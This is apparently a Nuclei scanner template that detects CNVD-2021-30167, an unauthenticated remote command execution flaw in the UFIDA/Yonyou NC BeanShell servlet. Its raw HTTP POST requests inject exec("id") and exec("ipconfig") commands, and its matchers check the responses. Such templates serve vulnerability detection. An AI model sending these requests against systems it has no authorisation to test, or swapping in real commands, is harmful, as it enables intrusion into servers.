id: CNVD-2021-30167 info: name: UFIDA NC BeanShell Remote Command Execution author: pikpikcu severity: critical description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program. reference: - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - https://www.cnvd.org.cn/webinfo/show/6491 - https://chowdera.com/2022/03/202203110138271510.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-77 metadata: max-request: 2 tags: cnvd,cnvd2021,beanshell,rce,yonyou http: - raw: - | #linux POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded bsh.script=exec("id"); - | #windows POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded bsh.script=exec("ipconfig"); matchers-condition: and matchers: - type: regex regex: - "uid=" - "Windows IP" condition: or - type: word words: - "BeanShell Test Servlet" - type: status status: - 200 # digest: 490a00463044022075851a06d033f726653dc465d8edecb38faafda19c132555fc9696ecb02992d7022020a632b9d53f6a468b8d01d87e238496e6284c3b5331e5ea7f0a868c534cac22:922c64590222798bb761d5b6d8e72950